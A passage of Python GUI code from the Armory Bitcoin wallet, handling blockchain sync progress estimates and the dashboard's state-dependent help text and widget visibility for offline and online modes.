self.barProgressScan.setFormat('')
self.barProgressBuild.setValue(0)
self.barProgressBuild.setRange(0,0)
self.lblTimeLeftBuild.setVisible(False)
elif phase==Cpp.BDMPhase_BlockHeaders:
self.lblDashModeBuild.setText( tr('Reading New Block Headers'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_BlockData:
self.lblDashModeBuild.setText( tr('Building Databases'), \
size=4, bold=True, color='Foreground')
self.lblDashModeScan.setText( tr('Scan Transaction History'), \
size=4, bold=True, color='DisableFG')
self.barProgressBuild.setFormat('%p%')
self.barProgressScan.setFormat('')
self.barProgressBuild.setRange(0,100)
elif phase==Cpp.BDMPhase_Rescan:
self.lblDashModeBuild.setText( tr('Build Databases'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeScan.setText( tr('Scanning Transaction History'), \
size=4, bold=True, color='Foreground')
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setFormat('')
self.barProgressBuild.setValue(100)
self.barProgressBuild.setRange(0,100)
self.barProgressScan.setFormat('%p%')
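# Round the remaining-time estimate up to the next 15-second step,
# presumably so the countdown label ticks in steady increments instead of
# jittering on every heartbeat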
tleft15 = (int(tleft-1)/15 + 1)*15
if tleft < 2:
tstring = ''
pvalue = pct*100
else:
tstring = secondsToHumanTime(tleft15)
pvalue = pct*100
if phase==Cpp.BDMPhase_BlockHeaders or phase==Cpp.BDMPhase_BlockData or phase==Cpp.BDMPhase_DBHeaders:
self.lblTimeLeftBuild.setText(tstring)
self.barProgressBuild.setValue(int(pvalue))
elif phase==Cpp.BDMPhase_Rescan:
self.lblTimeLeftScan.setText(tstring)
self.barProgressScan.setValue(int(pvalue))
elif TheSDM.getSDMState() in ['BitcoindInitializing','BitcoindSynchronizing']:
self.barProgressTorrent.setVisible(TheTDM.isStarted())
self.lblDashModeTorrent.setVisible(TheTDM.isStarted())
self.barProgressTorrent.setValue(100)
self.lblTimeLeftTorrent.setVisible(False)
self.lblTorrentStats.setVisible(False)
self.barProgressTorrent.setFormat('')
self.lblDashModeSync.setVisible(True)
self.barProgressSync.setVisible(True)
self.lblTimeLeftSync.setVisible(True)
self.barProgressSync.setFormat('%p%')
self.lblDashModeBuild.setVisible(True)
self.barProgressBuild.setVisible(True)
self.lblTimeLeftBuild.setVisible(False)
self.barProgressBuild.setValue(0)
self.barProgressBuild.setFormat('')
self.lblDashModeScan.setVisible(True)
self.barProgressScan.setVisible(True)
self.lblTimeLeftScan.setVisible(False)
self.barProgressScan.setValue(0)
self.barProgressScan.setFormat('')
ssdm = TheSDM.getSDMState()
lastBlkNum = self.getSettingOrSetDefault('LastBlkRecv', 0)
lastBlkTime = self.getSettingOrSetDefault('LastBlkRecvTime', 0)
# Get data from SDM if it has it
info = TheSDM.getTopBlockInfo()
if len(info['tophash'])>0:
lastBlkNum = info['numblks']
lastBlkTime = info['toptime']
# Use a reference point if we are starting from scratch
refBlock = max(290746, lastBlkNum)
refTime = max(1394922889, lastBlkTime)
# Ten min/block is pretty accurate, even from genesis (about 1% slow)
# And it gets better as we sync past the reference block above
self.approxMaxBlock = refBlock + int((RightNow() - refTime) / (10*MINUTE))
self.approxBlkLeft = self.approxMaxBlock - lastBlkNum
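# Example: if refTime were exactly one day ago, this extrapolation adds
# 24*60/10 = 144 blocks to the reference height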
self.approxPctSoFar = self.getPercentageFinished(self.approxMaxBlock, \
lastBlkNum)
self.initSyncCircBuff.append([RightNow(), self.approxPctSoFar])
if len(self.initSyncCircBuff)>30:
# There are always a couple of wacky measurements up front, so start at index 10
t0,p0 = self.initSyncCircBuff[10]
t1,p1 = self.initSyncCircBuff[-1]
dt,dp = t1-t0, p1-p0
if dt>600:
self.initSyncCircBuff = self.initSyncCircBuff[1:]
if dp>0 and dt>0:
dpPerSec = dp / dt
if lastBlkNum < 200000:
dpPerSec = dpPerSec / 2
timeRemain = (1 - self.approxPctSoFar) / dpPerSec
#timeRemain = min(timeRemain, 8*HOUR)
else:
timeRemain = None
else:
timeRemain = None
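# In short: extrapolate the recent percent-per-second sync rate over the
# remaining fraction. The rate is halved below block 200,000, presumably
# because the early (small) blocks sync far faster than recent ones and
# would otherwise make the estimate wildly optimistic.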
intPct = int(100*self.approxPctSoFar)
strPct = '%d%%' % intPct
self.barProgressSync.setFormat('%p%')
if ssdm == 'BitcoindReady':
# Probably not completely done yet, but close enough to show 99%
self.lblTimeLeftSync.setText(tr('Almost Done...'))
self.barProgressSync.setValue(99)
return
elif ssdm == 'BitcoindSynchronizing':
sdmPercent = int(99.9*self.approxPctSoFar)
if self.approxBlkLeft < 10000:
if self.approxBlkLeft < 200:
self.lblTimeLeftSync.setText(tr('%(n)d blocks') % { 'n':self.approxBlkLeft})
else:
# If we're within 10k blocks, estimate based on blkspersec
if info['blkspersec'] > 0:
timeleft = int(self.approxBlkLeft/info['blkspersec'])
self.lblTimeLeftSync.setText(secondsToHumanTime(timeleft))
else:
# If we're more than 10k blocks behind...
if timeRemain:
timeRemain = min(24*HOUR, timeRemain)
self.lblTimeLeftSync.setText(secondsToHumanTime(timeRemain))
else:
self.lblTimeLeftSync.setText('')
elif ssdm == 'BitcoindInitializing':
sdmPercent = 0
self.barProgressSync.setFormat('')
self.barProgressBuild.setFormat('')
self.barProgressScan.setFormat('')
else:
LOGERROR('Should not predict sync info in non init/sync SDM state')
return ('UNKNOWN','UNKNOWN', 'UNKNOWN')
self.barProgressSync.setValue(sdmPercent)
else:
LOGWARN('Called updateSyncProgress while not sync\'ing')
#############################################################################
def GetDashFunctionalityText(self, func):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
if func.lower() == 'scanning':
return tr( \
'The following functionality is available while scanning in offline mode:'
'<ul>'
'<li>Create new wallets</li>'
'<li>Generate receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign transactions created from an online system</li>'
'<li>Sign messages</li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, even if you are offline. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'offline':
return tr( \
'The following functionality is available in offline mode:'
'<ul>'
'<li>Create, import or recover wallets</li>'
'<li>Generate new receiving addresses for your wallets</li>'
'<li>Create backups of your wallets (printed or digital)</li>'
'<li>Import private keys to wallets</li>'
'<li>Change wallet encryption settings</li>'
'<li>Sign messages</li>'
'<li><b>Sign transactions created from an online system</b></li>'
'</ul>'
'<br><br><b>NOTE:</b> The Bitcoin network <u>will</u> process transactions '
'to your addresses, regardless of whether you are online. It is perfectly '
'okay to create and distribute payment addresses while Armory is offline; '
'you just won\'t be able to verify those payments until the next time '
'Armory is online.')
elif func.lower() == 'online':
return tr( \
'<ul>'
'<li>Create, import or recover Armory wallets</li>'
'<li>Generate new addresses to receive coins</li>'
'<li>Send bitcoins to other people</li>'
'<li>Create one-time backups of your wallets (in printed or digital form)</li>'
'<li>Click on "bitcoin:" links in your web browser '
'(not supported on all operating systems)</li>'
'<li>Import private keys to wallets</li>'
'<li>Monitor payments to watching-only wallets and create '
'unsigned transactions</li>'
'<li>Sign messages</li>'
'<li><b>Create transactions with watching-only wallets, '
'to be signed by an offline wallet</b></li>'
'</ul>')
#############################################################################
def GetDashStateText(self, mgmtMode, state):
"""
Outsourcing all the verbose dashboard text to here, to de-clutter the
logic paths in the setDashboardDetails function
"""
# A few states don't care which mgmtMode you are in...
if state == 'NewUserInfo':
return tr("""
For more information about Armory, and even Bitcoin itself, you should
visit the <a href="https://bitcoinarmory.com/faq/">frequently
asked questions page</a>. If
you are experiencing problems using this software, please visit the
<a href="https://bitcoinarmory.com/troubleshooting/">Armory
troubleshooting webpage</a>. It will be updated frequently with
solutions to common problems.
<br><br>
<b><u>IMPORTANT:</u></b> Make a backup of your wallet(s)! Paper
backups protect you <i>forever</i> against forgotten passwords,
hard-drive failure, and make it easy for your family to recover
your funds if something terrible happens to you. <i>Each wallet
only needs to be backed up once, ever!</i> Without it, you are at
risk of losing all of your Bitcoins! For more information,
visit the <a href="https://bitcoinarmory.com/armory-backups-are-forever/">Armory
Backups page</a>.
<br><br>
To learn about improving your security through the use of offline
wallets, visit the
<a href="https://bitcoinarmory.com/using-our-wallet">Armory
Quick Start Guide</a>, and the
<a href="https://bitcoinarmory.com/using-our-wallet/#offlinewallet">Offline
Wallet Tutorial</a>.<br><br> """)
elif state == 'OnlineFull1':
return tr( \
'<p><b>You now have access to all the features Armory has to offer!</b><br>'
'To see your balances and transaction history, please click '
'on the "Transactions" tab above this text. <br>'
'Here\'s some things you can do with Armory Bitcoin Client:'
'<br>')
elif state == 'OnlineFull2':
return ( \
(tr('If you experience any performance issues with Armory, '
'please confirm that Bitcoin-Qt is running and <i>fully '
'synchronized with the Bitcoin network</i>. You will see '
'a green checkmark in the bottom right corner of the '
'Bitcoin-Qt window if it is synchronized. If not, it is '
'recommended you close Armory and restart it only when you '
'see that checkmark.'
'<br><br>') if not self.doAutoBitcoind else '') + tr(
'<b>Please backup your wallets!</b> Armory wallets are '
'"deterministic", meaning they only need to be backed up '
'one time (unless you have imported external addresses/keys). '
'Make a backup and keep it in a safe place! All funds from '
'Armory-generated addresses will always be recoverable with '
'a paper backup, any time in the future. Use the "Backup '
'Individual Keys" option for each wallet to backup imported '
'keys.</p>'))
elif state == 'OnlineNeedSweep':
return tr( \
'Armory is currently online, but you have requested a sweep operation '
'on one or more private keys. This requires searching the global '
'transaction history for the available balance of the keys to be '
'swept. '
'<br><br>'
'Press the button to start the blockchain scan, which '
'will also put Armory into offline mode for a few minutes '
'until the scan operation is complete')
elif state == 'OnlineDirty':
return tr( \
'<b>Wallet balances may '
'be incorrect until the rescan operation is performed!</b>'
'<br><br>'
'Armory is currently online, but addresses/keys have been added '
'without rescanning the blockchain. You may continue using '
'Armory in online mode, but any transactions associated with the '
'new addresses will not appear in the ledger. '
'<br><br>'
'Pressing the button above will put Armory into offline mode '
'for a few minutes until the scan operation is complete.')
elif state == 'OfflineNoSatoshiNoInternet':
return tr( \
'There is no connection to the internet, and there is no other '
'Bitcoin software running. Most likely '
'you are here because this is a system dedicated '
'to manage offline wallets! '
'<br><br>'
'<b>If you expected Armory to be in online mode</b>, '
'please verify your internet connection is active, '
'then restart Armory. If you think the lack of internet '
'connection is in error (such as if you are using Tor), '
'then you can restart Armory with the "--skip-online-check" '
'option, or change it in the Armory settings.'
'<br><br>'
'If you do not have Bitcoin-Qt installed, you can '
'download it from <a href="http://www.bitcoin.org">'
'http://www.bitcoin.org</a>.')
# Branch the available display text based on which Satoshi-Management
# mode Armory is using. It probably wasn't necessary to branch
# the code like this, but it helped me organize the seemingly-endless
# number of dashboard screens I need
if mgmtMode.lower()=='user':
if state == 'OfflineButOnlinePossible':
return tr( \
'You are currently in offline mode, but can '
'switch to online mode by pressing the button above. However, '
'it is not recommended that you switch until '
'Bitcoin-Qt/bitcoind is fully synchronized with the bitcoin network. '
'You will see a green checkmark in the bottom-right corner of '
'the Bitcoin-Qt window when it is finished.'
'<br><br>'
'Switching to online mode will give you access '
'to more Armory functionality, including sending and receiving '
'bitcoins and viewing the balances and transaction histories '
'of each of your wallets.<br><br>')
elif state == 'OfflineNoSatoshi':
bitconf = os.path.join(BTC_HOME_DIR, 'bitcoin.conf')
return tr( \
'You are currently in offline mode because '
'Bitcoin-Qt is not running. To switch to online '
'mode, start Bitcoin-Qt and let it synchronize with the network '
'-- you will see a green checkmark in the bottom-right corner when '
'it is complete. If Bitcoin-Qt is already running and you believe '
'the lack of connection is an error (especially if using proxies), '
'please see <a href="'
'https://bitcointalk.org/index.php?topic=155717.msg1719077#msg1719077">'
'this link</a> for options.'
'<br><br>'
'<b>If you prefer to have Armory do this for you</b>, '
'then please check "Let Armory run '
'Bitcoin-Qt in the background" under "File"->"Settings."'
'<br><br>'
'If you are new to Armory and/or Bitcoin-Qt, '
'please visit the Armory '
'webpage for more information. Start at '
'<a href="https://bitcoinarmory.com/armory-and-bitcoin-qt">'
'Why Armory needs Bitcoin-Qt</a> or go straight to our <a '
'href="https://bitcoinarmory.com/faq/">'
'frequently asked questions</a> page for more general information. '
'If you already know what you\'re doing and simply need '
'to fetch the latest version of Bitcoin-Qt, you can download it from '
'<a href="http://www.bitcoin.org">http://www.bitcoin.org</a>.')
elif state == 'OfflineNoInternet':
return tr( \
'You are currently in offline mode because '
'Armory could not detect an internet connection. '
'If you think this is in error, then '
'restart Armory using the "--skip-online-check" option, '
'or adjust the Armory settings and restart Armory.'
'<br><br>'
'If this is intended to be an offline computer, note '
'that it is not necessary to have Bitcoin-Qt or bitcoind '
'running.' )
elif state == 'OfflineNoBlkFiles':
return tr( \
'You are currently in offline mode because '
'Armory could not find the blockchain files produced '
'by Bitcoin-Qt. Do you run Bitcoin-Qt (or bitcoind) '
'from a non-standard directory? Armory expects to '
'find the blkXXXX.dat files in <br><br>%s<br><br> '
'If you know where they are located, please restart '
'Armory using the "--satoshi-datadir=[path]" option '
'to tell Armory where to find them.') % BLKFILE_DIR
elif state == 'Disconnected':
return tr( \
'Armory was previously online, but the connection to Bitcoin-Qt/'
'bitcoind was interrupted. You will not be able to send bitcoins '
'or confirm receipt of bitcoins until the connection is '
'reestablished. <br><br>Please check that Bitcoin-Qt is open '
'and synchronized with the network. Armory will <i>try to '
'reconnect</i> automatically when the connection is available '
'again. If Bitcoin-Qt is available again, and reconnection does '
'not happen, please restart Armory.<br><br>')
elif state == 'ScanNoWallets':
return tr( \
'Please wait while the global transaction history is scanned. '
'Armory will go into online mode automatically, as soon as '
'the scan is complete.')
elif state == 'ScanWithWallets':
return tr( \
'Armory is scanning the global transaction history to retrieve '
'information about your wallets. The "Transactions" tab will '
'be updated with wallet balance and history as soon as the scan is '
'complete. You may manage your wallets while you wait.<br><br>')
else:
LOGERROR('Unrecognized dashboard state: Mgmt:%s, State:%s', \
mgmtMode, state)
return ''
elif mgmtMode.lower()=='auto':
if state == 'OfflineBitcoindRunning':
return tr( \
'It appears you are already running Bitcoin software '
'(Bitcoin-Qt or bitcoind). '
'Unlike previous versions of Armory, you should <u>not</u> run '
'this software yourself -- Armory '
'will run it in the background for you. Either close the '
'Bitcoin application or adjust your settings. If you change '
'your settings, then please restart Armory.')
if state == 'OfflineNeedBitcoinInst':
return tr( \
'<b>Only one more step to getting online with Armory!</b> You '
'must install the Bitcoin software from www.bitcoin.org in order '
'for Armory to communicate with the Bitcoin network. If the '
'Bitcoin software is already installed and/or you would prefer '
'to manage it yourself, please adjust your settings and '
'restart Armory.')
if state == 'InitializingLongTime':
return tr("""
<b>To maximize your security, the Bitcoin engine is downloading
and verifying the global transaction ledger. <u>This will take
several hours, but only needs to be done once</u>!</b> It is
usually best to leave it running over night for this
initialization process. Subsequent loads will only take a few
minutes.
<br><br>
<b>Please Note:</b> Between Armory and the underlying Bitcoin
engine, you need to have 40-50 GB of spare disk space available
to hold the global transaction history.
<br><br>
While you wait, you can manage your wallets. Make new wallets,
make digital or paper backups, create Bitcoin addresses to receive
payments,
sign messages, and/or import private keys. You will always
receive Bitcoin payments regardless of whether you are online,
but you will have to verify those payments through another service
until Armory has finished this initialization.""")
if state == 'InitializingDoneSoon':
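# Note: the three-argument tr(singular, plural, n) form below selects
# between the "wallet"/"wallets" variants based on len(self.walletMap)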
msg = tr( \
'The software is downloading and processing the latest activity '
'on the network related to your wallet. This should take only '
'a few minutes. While you wait, you can manage your wallets. '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallet if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever! See the <a href="https://bitcoinarmory.com/">'
'Armory Backups page</a> for more info.',
'The software is downloading and processing the latest activity '
'on the network related to your wallets. This should take only '
'a few minutes. While you wait, you can manage your wallets. '
'<br><br>'
'Now would be a good time to make paper (or digital) backups of '
'your wallets if you have not done so already! You are protected '
'<i>forever</i> from hard-drive loss, or forgetting your password. '
'If you do not have a backup, you could lose all of your '
'Bitcoins forever! See the <a href="https://bitcoinarmory.com/">'
'Armory Backups page</a> for more info.',
len(self.walletMap)
)
return msg
if state == 'OnlineDisconnected':
return tr( \
'Armory\'s communication with the Bitcoin network was interrupted. '
'This usually does not happen unless you closed the process that '
'Armory was using to communicate with the network. Armory requires '
'%(sdm)s to be running in the background, and this error pops up if it '
'disappears.'
'<br><br>You may continue in offline mode, or you can close '
'all Bitcoin processes and restart Armory.') \
% { 'sdm' : os.path.basename(TheSDM.executable) }
if state == 'OfflineBadConnection':
return tr( \
'Armory has experienced an issue trying to communicate with the '
'Bitcoin software. The software is running in the background, '
'but Armory cannot communicate with it through RPC as it expects '
'to be able to. If you changed any settings in the Bitcoin home '
'directory, please make sure that RPC is enabled and that it is '
'accepting connections from localhost. '
'<br><br>'
'If you have not changed anything, please export the log file '
'(from the "File" menu) and send it to support@bitcoinarmory.com')
if state == 'OfflineSatoshiAvail':
return tr( \
'Armory does not detect internet access, but it does detect '
'running Bitcoin software. Armory is in offline-mode. <br><br>'
'If you are intending to run an offline system, you will not '
'need to have the Bitcoin software installed on the offline '
'computer. It is only needed for the online computer. '
'If you expected to be online and '
'the absence of internet is an error, please restart Armory '
'using the "--skip-online-check" option. ')
if state == 'OfflineForcedButSatoshiAvail':
return tr( \
'Armory was started in offline-mode, but detected you are '
'running Bitcoin software. If you are intending to run an '
'offline system, you will <u>not</u> need to have the Bitcoin '
'software installed or running on the offline '
'computer. It is only required for being online. ')
if state == 'OfflineBadDBEnv':
return tr( \
'The Bitcoin software indicates there '
'is a problem with its databases. This can occur when '
'Bitcoin-Qt/bitcoind is upgraded or downgraded, or sometimes '
'just by chance after an unclean shutdown.'
'<br><br>'
'You can either revert your installed Bitcoin software to the '
'last known working version (but not earlier than version 0.8.1) '
'or delete everything <b>except</b> "wallet.dat" from your Bitcoin '
'home directory:<br><br>'
'<font face="courier"><b>%(satoshipath)s</b></font>'
'<br><br>'
'If you choose to delete the contents of the Bitcoin home '
'directory, you will have to do a fresh download of the blockchain '
'again, which will require a few hours the first '
'time.') % { 'satoshipath' : self.satoshiHomePath }
if state == 'OfflineBtcdCrashed':
sout = '' if TheSDM.btcOut is None else str(TheSDM.btcOut)
serr = '' if TheSDM.btcErr is None else str(TheSDM.btcErr)
soutHtml = '<br><br>' + '<br>'.join(sout.strip().split('\n'))
serrHtml = '<br><br>' + '<br>'.join(serr.strip().split('\n'))
soutDisp = '<b><font face="courier">StdOut: %s</font></b>' % soutHtml
serrDisp = '<b><font face="courier">StdErr: %s</font></b>' % serrHtml
if len(sout)>0 or len(serr)>0:
return (tr("""
There was an error starting the underlying Bitcoin engine.
This should not normally happen. Usually it occurs when you
have been using Bitcoin-Qt prior to using Armory, especially
if you have upgraded or downgraded Bitcoin-Qt recently.
Output from bitcoind:<br>""") + \
(soutDisp if len(sout)>0 else '') + \
(serrDisp if len(serr)>0 else '') )
else:
return ( tr("""
There was an error starting the underlying Bitcoin engine.
This should not normally happen. Usually it occurs when you
have been using Bitcoin-Qt prior to using Armory, especially
if you have upgraded or downgraded Bitcoin-Qt recently.
<br><br>
Unfortunately, this error is so strange, Armory does not
recognize it. Please go to "Export Log File" from the "File"
menu and email it as an attachment to <a href="mailto:
support@bitcoinarmory.com?Subject=Bitcoind%20Crash">
support@bitcoinarmory.com</a>. We apologize for the
inconvenience!"""))
# TODO - move out of polling and call on events
#############################################################################
def setDashboardDetails(self, INIT=False):
"""
We've dumped all the dashboard text into the above 2 methods in order
to declutter this method.
"""
if self.isShuttingDown:
return
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
tdmState = TheTDM.getTDMState()
descr = ''
descr1 = ''
descr2 = ''
# Methods for showing/hiding groups of widgets on the dashboard
def setBtnRowVisible(r, visBool):
for c in range(3):
self.dashBtns[r][c].setVisible(visBool)
def setSyncRowVisible(b):
self.lblDashModeSync.setVisible(b)
self.barProgressSync.setVisible(b)
self.lblTimeLeftSync.setVisible(b)
def setTorrentRowVisible(b):
self.lblDashModeTorrent.setVisible(b)
self.barProgressTorrent.setVisible(b)
self.lblTimeLeftTorrent.setVisible(b)
self.lblTorrentStats.setVisible(b)
def setBuildRowVisible(b):
self.lblDashModeBuild.setVisible(b)
self.barProgressBuild.setVisible(b)
self.lblTimeLeftBuild.setVisible(b)
def setScanRowVisible(b):
self.lblDashModeScan.setVisible(b)
self.barProgressScan.setVisible(b)
self.lblTimeLeftScan.setVisible(b)
def setOnlyDashModeVisible():
setTorrentRowVisible(False)
setSyncRowVisible(False)
setBuildRowVisible(False)
setScanRowVisible(False)
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
self.lblDashModeSync.setVisible(True)
def setBtnFrameVisible(b, descr=''):
self.frmDashMidButtons.setVisible(b)
self.lblDashBtnDescr.setVisible(len(descr)>0)
self.lblDashBtnDescr.setText(descr)
if INIT:
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, False)
setBtnRowVisible(DASHBTNS.Close, False)
setOnlyDashModeVisible()
# This keeps popping up for some reason!
self.lblTorrentStats.setVisible(False)
if self.doAutoBitcoind and not sdmState=='BitcoindReady':
# User is letting Armory manage the Satoshi client for them.
# TODO - Move to event handlers
if not sdmState==self.lastSDMState:
self.lblBusy.setVisible(False)
self.btnModeSwitch.setVisible(False)
# There's a whole bunch of stuff that has to be hidden/shown
# depending on the state... set some reasonable defaults here
setBtnFrameVisible(False)
setBtnRowVisible(DASHBTNS.Install, False)
setBtnRowVisible(DASHBTNS.Browse, False)
setBtnRowVisible(DASHBTNS.Instruct, False)
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Close, False)
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
setOnlyDashModeVisible()
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
if satoshiIsAvailable():
self.frmDashMidButtons.setVisible(True)
setBtnRowVisible(DASHBTNS.Close, True)
if CLI_OPTIONS.offline:
# Forced offline but bitcoind is running
LOGINFO('Dashboard switched to auto-OfflineForcedButSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineForcedButSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineSatoshiAvail')
descr1 += self.GetDashStateText('Auto', 'OfflineSatoshiAvail')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
LOGINFO('Dashboard switched to auto-OfflineNoSatoshiNoInternet')
setBtnFrameVisible(True, \
tr('In case you actually do have internet access, you can use '
'the following links to get Armory installed. Or change '
'your settings.'))
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
descr1 += self.GetDashStateText('Auto','OfflineNoSatoshiNoInternet')
descr2 += self.GetDashFunctionalityText(tr('Offline'))
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif not TheSDM.isRunningBitcoind() and not TheTDM.isRunning():
setOnlyDashModeVisible()
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
# Bitcoind is not being managed, but we want it to be
if satoshiIsAvailable() or sdmState=='BitcoindAlreadyRunning':
# But bitcoind/-qt is already running
LOGINFO('Dashboard switched to auto-butSatoshiRunning')
self.lblDashModeSync.setText(tr(' Please close Bitcoin-Qt'), \
size=4, bold=True)
setBtnFrameVisible(True, '')
setBtnRowVisible(DASHBTNS.Close, True)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(tr('Check Again'))
#setBtnRowVisible(DASHBTNS.Close, True)
descr1 += self.GetDashStateText('Auto', 'OfflineBitcoindRunning')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
#self.psutil_detect_bitcoin_exe_path()
elif sdmState in ['BitcoindExeMissing', 'BitcoindHomeMissing']:
LOGINFO('Dashboard switched to auto-cannotFindExeHome')
if sdmState=='BitcoindExeMissing':
self.lblDashModeSync.setText(tr('Cannot find Bitcoin Installation'), \
size=4, bold=True)
else:
self.lblDashModeSync.setText(tr('Cannot find Bitcoin Home Directory'), \
size=4, bold=True)
setBtnRowVisible(DASHBTNS.Close, satoshiIsAvailable())
setBtnRowVisible(DASHBTNS.Install, True)
setBtnRowVisible(DASHBTNS.Browse, True)
setBtnRowVisible(DASHBTNS.Settings, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
self.btnModeSwitch.setVisible(True)
self.btnModeSwitch.setText(tr('Check Again'))
setBtnFrameVisible(True)
descr1 += self.GetDashStateText('Auto', 'OfflineNeedBitcoinInst')
descr2 += self.GetDashStateText('Auto', 'NewUserInfo')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
elif sdmState in ['BitcoindDatabaseEnvError']:
LOGINFO('Dashboard switched to auto-BadDBEnv')
setOnlyDashModeVisible()
setBtnRowVisible(DASHBTNS.Install, True)
#setBtnRowVisible(DASHBTNS.Instruct, not OS_WINDOWS)
setBtnRowVisible(DASHBTNS.Settings, True)
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBadDBEnv')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
setBtnFrameVisible(True, '')
elif sdmState in ['BitcoindUnknownCrash']:
LOGERROR('Should not usually get here')
setOnlyDashModeVisible()
setBtnFrameVisible(True, \
tr('Try reinstalling the Bitcoin '
'software then restart Armory. If you continue to have '
'problems, please contact Armory\'s core developer at '
'<a href="mailto:support@bitcoinarmory.com?Subject=Bitcoind%20Crash"'
'>support@bitcoinarmory.com</a>.'))
setBtnRowVisible(DASHBTNS.Settings, True)
setBtnRowVisible(DASHBTNS.Install, True)
LOGINFO('Dashboard switched to auto-BtcdCrashed')
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBtcdCrashed')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
self.lblDashDescr1.setTextInteractionFlags( \
Qt.TextSelectableByMouse | \
Qt.TextSelectableByKeyboard)
elif sdmState in ['BitcoindNotAvailable']:
LOGERROR('BitcoindNotAvailable: should not happen...')
self.notAvailErrorCount += 1
descr1 += ''
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else:
setBtnFrameVisible(False)
descr1 += ''
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(descr1)
self.lblDashDescr2.setText(descr2)
else: # online detected/forced, and TheSDM has already been started
if sdmState in ['BitcoindWrongPassword', 'BitcoindNotAvailable']:
extraTxt = ''
if not self.wasSynchronizing:
setOnlyDashModeVisible()
else:
extraTxt = tr("""
<b>Armory has lost connection to the
core Bitcoin software. If you did not do anything
that affects your network connection or the bitcoind
process, it will probably recover on its own in a
couple of minutes</b><br><br>""")
self.lblTimeLeftSync.setVisible(False)
self.barProgressSync.setFormat('')
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
LOGINFO('Dashboard switched to auto-BadConnection')
self.lblDashModeSync.setText( tr('Armory is <u>offline</u>'), \
size=4, color='TextWarn', bold=True)
descr1 += self.GetDashStateText('Auto', 'OfflineBadConnection')
descr2 += self.GetDashFunctionalityText('Offline')
self.lblDashDescr1.setText(extraTxt + descr1)
self.lblDashDescr2.setText(descr2)
elif sdmState in ['BitcoindInitializing', \
'BitcoindSynchronizing', \
'TorrentSynchronizing']:
self.wasSynchronizing = True
LOGINFO('Dashboard switched to auto-InitSync')
self.lblBusy.setVisible(True)
self.mainDisplayTabs.setTabEnabled(self.MAINTABS.Ledger, False)
self.updateSyncProgress()
# If torrent ever ran, leave it visible
setSyncRowVisible(True)
setScanRowVisible(True)
setTorrentRowVisible(TheTDM.isStarted())
if TheTDM.isRunning():
self.lblDashModeTorrent.setText(tr('Downloading via Armory CDN'), \
size=4, bold=True, color='Foreground')
self.lblDashModeSync.setText( tr('Synchronizing with Network'), \
size=4, bold=True, color='DisableFG')
self.lblTorrentStats.setVisible(True)
elif sdmState=='BitcoindInitializing':
self.lblDashModeTorrent.setText(tr('Download via Armory CDN'), \
size=4, bold=True, color='DisableFG')
self.lblDashModeSync.setText( tr('Initializing Bitcoin Engine'), \
size=4, bold=True, color='Foreground')
self.lblTorrentStats.setVisible(False)
else:
self.lblDashModeTorrent.setText(tr('Download via Armory CDN'), \
size=4, bold=True, color='DisableFG')
